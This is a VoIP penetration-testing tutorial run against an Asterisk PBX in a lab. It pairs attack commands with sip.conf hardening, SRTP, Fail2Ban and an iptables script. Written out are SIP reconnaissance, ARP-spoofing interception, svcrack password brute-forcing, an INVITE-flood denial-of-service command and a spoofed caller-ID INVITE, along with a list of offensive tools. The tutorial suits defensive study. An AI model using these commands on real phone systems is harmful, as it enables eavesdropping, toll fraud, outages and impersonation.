Attacking and Defending VOIP Systems

By Ahmad Qubbaj

VOIP introduction:
Voice over Internet Protocol (VoIP) is a methodology and group of technologies for the
delivery of voice communications and multimedia sessions over Internet Protocol (IP)
networks, such as the Internet. Other terms commonly associated with VoIP are IP
telephony, Internet telephony, voice over broadband (VoBB), broadband telephony, IP
communications, and broadband phone service.
VoIP is an exciting technology which provides many beneits and cost efective
solutions for communication. More and more small and enterprise businesses are
replacing their old traditional telephony systems with an IP based ones.
A VoIP based PBX can provide many features such as: Multiple Extensions, Caller ID,
Voice mail, IVR capabilities, Recording of conversations, Logging, Usage with hardware
based telephones or software based aka soft phones.
Now days there are many vendors for PBX, IP telephones, VoIP services and equipment
such as: CISCO, AVAYA and ASTERISK, SNOM, THOMSON With new technology comes
a new challenge for both the defensive and ofensive side of security.

Typical VoIP Topologies:

There are several ways IP based telephony can be implemented, here are some
common topologies:-

Self Hosted
A PBX (i.e. Asterisk) is installed at the client site and connected to an ISP or telephony
service provider PSTN via a SIP Trunk/PRI, the VoIP traic lows through a dedicated
Vlan.

Hosted Services
There is no need for a PBX at site. Just a switch, a router, IP phones and a connection
to the service provider PBX via Internet or IP/VPN connection, each phone is
conigured with SIP account information.

Online SIP Service

Services like sipme.me provides an application for pc or smart phones and a free sip
account, Ofering low price for international calls and free calls between the service
users by assigning a pone number to each subscriber.

VOIP Pentest Methodology:

[*] Reconnaissance VOIP Servers
in this stage we are trying to understand the target system, information like server
type, system version, open ports, rtp or rtsp will be extremely important

[*] Sniing VOIP Traic

intercepting, manipulating, and listening to the conversations.

[*] Cracking VOIP Accounts

getting unauthorized account on the system (usernames and passwords).

[*] Denial of Service on VOIP Servers

DOS on VOIP

[*] Spooing and identity theft

Call someone as someone else, identity theft

Testing Environment:Target system:

Target IP:
Target OS:
Date:

asterisk
192.168.0.104
Centos
7/01/2013

Reconnaissance VOIP Servers

you can get all the information that you need about the voip server using tools
like (smap , sipsak , svmap.py )

ATTACK..
root@qubbaj:~# ./smap -O 192.168.0.104
smap 0.6.0 <hs@123.org> http://www.wormulon.net/
192.168.0.104: ICMP reachable, SIP enabled
best guess (77% sure) fingerprint:
Asterisk PBX SVN-trunk-r56579
<-Server: Asterisk PBX 1.6.2.0
<-1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)
1 host scanned, 1 ICMP reachable, 1 SIP enabled (1 host scanned, 1
ICMP reachable, 1 SIP enabled (100.0%)
root@qubbaj:~#
root@qubbaj:~# sipsak -vv -s sip:192.168.0.104
From: sip:sipsak@127.0.1.1:54669;tag=7244113d
To: sip:192.168.0.104;tag=as383f41be
Call-ID: 1917063485@127.0.1.1
CSeq: 1 OPTIONS

<--

Server: Asterisk PBX 1.6.2.0

Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE,NOTIFY, <-INFO
Supported: replaces, timer
Accept: application/sdp
Content-Length: 0
root@qubbaj:~#
root@qubbaj:~# ./svmap.py 192.168.0.104 --fp
--------------------------------------------------------------| SIP Device
| User Agent
| Fingerprint
|
--------------------------------------------------------------|192.168.0.104:5060 | Asterisk PBX 1.6.2.0 | Asterisk
<---------------------------------------------------------------root@qubbaj:~#

Reconnaissance VOIP Servers

DEFENCE..

1) Customizing User-Agent ield in the sip.conf useragent = <string> : Allow

the SIP header "User-Agent" to be customized. The default is "Asterisk PBX".

2) block ICMP request using iptables

3) Block OPTIONS method to hide the other methods,, edit qualify=no in

sip.conf,, qualify= means it uses sip options to ping a device every minute to
make sure it still has a connection and to renew NAT mappings if applicable.

4) Set alwaysauthreject=yes in your sip.conf ile.the default is no, which

allows extension information leakage. Setting this to yes will reject bad
authentication requests on valid usernames with the same rejection
information as with invalid usernames, denying remote attackers the ability to
detect existing extensions with brute-force guessing attacks.

5) Allow only one or two calls at a time per SIP entity, where possible. At the
worst, limiting your exposure to toll fraud is a wise thing to do. This also limits
your exposure when legitimate password holders on your system lose control of
their passphrase writing it on the bottom of the SIP phone, for instance, which
Ive seen.

6) Ensure your [default] context is secure. Dont allow unauthenticated callers

to reach any contexts allowguest=no in the [general] part of sip.conf

Sniing VOIP Traic

arpspoof and wireshark can do the job, simple arpspoof -> MITM ->
wireshark to capture some traic, wireshark have an built in RTP
player

ATTACK..
root@qubbaj:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@qubbaj:~# arpspoof -i wlan0 -t 192.168.0.104 192.168.0.2

Sniing VOIP Traic

DEFENCE..
1) use SRTP Protocol,, RTP Over SSL instead of RTP

Cracking VOIP Accounts

Using sipvicious Built in word-list and svcrack.py we have the ability to bruteforcing
voip account and now we can make free calls

ATTACK..
root@qubbaj:sipvicious# ./svcrack.py -u6020 -d pass.txt 192.168.0.104
| Extension | Password |
-----------------------| 6020
| 6020pass |
root@qubbaj:sipvicious#

Cracking VOIP Accounts

DEFENCE..
1) Use STRONG passwords for SIP entities. Use symbols, numbers, and a
mix of upper and lowercase letters at least 12 digits long.
2) Make your SIP usernames diferent than your extensions. While it
is convenient to have extension 1234 map to SIP entry 1234 which
is also SIP user 1234, this is an easy target for attackers to
guess SIP authentication names.
3) Fail2Ban is a limited intrusion detection/prevention system. It works by
scanning log files and then taking action based on the entries in those logs.
implementing Fail2Ban with a configuration to be able to prevent SIP brute
force attacks against Asterisk PBXs.

Denial of Service on VOIP Servers

ATTACK..
root@qubbaj:# ./invitelood eth0 target_extension target_domain target_ip
number_of_packets
root@qubbaj:#

Denial of Service on VOIP Servers

DEFENCE..
I have no idea..

Spooing and identity theft

Spooing Caller ID in SIP is fairly easy, you just need to change the
SIP request INVITE from header.

ATTACK..
SIP request INVITE from header.
INVITE sip:@127.0.0.1 SIP/2.0
To: <sip:192.168.1.104>
Via: SIP/2.0/UDP 192.168.1.104
From: "Evil Hacker"
Call-ID: 14810.0.1.45
CSeq: 1 INVITE
Max-Forwards: 20

DEFENCE..
I have no idea..

iptables script to secure sip and the other services

----------------------------------->
#!/bin/bash
#edit eth0 to you interface
EXIF="eth0"
# lush iptables
/sbin/iptables --lush
#drop all incoming traic but allow all outgoing traic. This
#will allow us to make outgoing connections from any port, but will
#only allow incoming connections on the ports speciied below.
/sbin/iptables --policy INPUT DROP
/sbin/iptables --policy OUTPUT ACCEPT
# Allow all incoming traic if it is coming from the local loopback
device
/sbin/iptables -A INPUT -i lo -j ACCEPT
# Accept all incoming traic associated with an established
connection, or a "related" connection
/sbin/iptables -A INPUT -i $EXIF -m state --state ESTABLISHED,RELATED
-j ACCEPT
# Check new packets are SYN packets for syn-lood protection
/sbin/iptables -A INPUT -p tcp ! --syn -m state --state NEW -j DROP
# Drop fragmented packets

/sbin/iptables -A INPUT -f -j DROP

# Drop malformed XMAS packets
/sbin/iptables -A INPUT -p tcp --tcp-lags ALL ALL -j DROP
# Drop null packets
/sbin/iptables -A INPUT -p tcp --tcp-lags ALL NONE -j DROP
# Allow connections to port 22 - ssh. You can add other ports you
need in here
/sbin/iptables -A INPUT -p tcp -i $EXIF --dport 22 -m state --state
NEW -j ACCEPT
# Allow connections from my machines
/sbin/iptables -A INPUT -p tcp -i $EXIF -m state --state NEW -s
100.101.5.182 -j ACCEPT
/sbin/iptables -A INPUT -p tcp -i $EXIF -m state --state NEW -s
200.123.88.196 -j ACCEPT
# Allow SIP connections
/sbin/iptables -A INPUT -p udp -i $EXIF --dport 5060 -m udp -j ACCEPT
/sbin/iptables -A INPUT -p tcp -i $EXIF --dport 5060 -m tcp -j ACCEPT
/sbin/iptables -A INPUT -p udp -i $EXIF --dport 10000:20000 -m udp -j
ACCEPT
# Allow icmp input so that people can ping us
/sbin/iptables -A INPUT -p icmp --icmp-type 8 -m state --state NEW -j
ACCEPT
# Log then drop any packets that are not allowed. You will probably
want to turn of the logging
#/sbin/iptables -A INPUT -j LOG
/sbin/iptables -A INPUT -j REJECT
----------------------------------------->

VOIP security tools Full List

Scanning

fping
Nessus
nmap
snmpwalk
SNSscan
SuperScan
VLANping
Enumeration

netcat
SiVuS
sipsak
SIPSCAN
smap
TFTP Brute Forcer

 Infrastructure Denial of Service

DNS Auditing tool

Internetwork Routing Protocol Attack Suite
UDP Flooder
UDP Flooder w/VLAN support
Wireshark (formerly Ethereal)
Eavesdropping

Angst
Cain and Abel
DTMF Decoder
dsniff
NetStumbler
Oreka
VoIPong
vomit
Network and Application Interception

arpwatch
Cain and Abel
dsniff
ettercap
fragrouter
siprogue
XArp
Cisco Uniied CallManager

Skinny Traffic Sample

Asterisk

IAX Flooder
IAX Enumerator
Fuzzing

ohrwurm RTP fuzzer

PROTOS SIP fuzzing suite
TCPView
Disruption of Service

INVITE Flooder
RTP Flooder
UDP Flooder
UDP Flooder w/VLAN support
Signaling and Media Manipulation

AuthTool
BYE Teardown
Check Sync Phone Rebooter
RedirectPoison
Registration Hijacker
Registration Eraser
Registration Adder
RTP InsertSound v2.0
RTP InsertSound v3.0
RTP MixSound v2.0
RTP MixSound v3.0

References
https://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Endler.pdf
http://en.wikipedia.org/wiki/Voice_over_IP
http://www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP
http://www.hackingvoip.com/sec_tools.html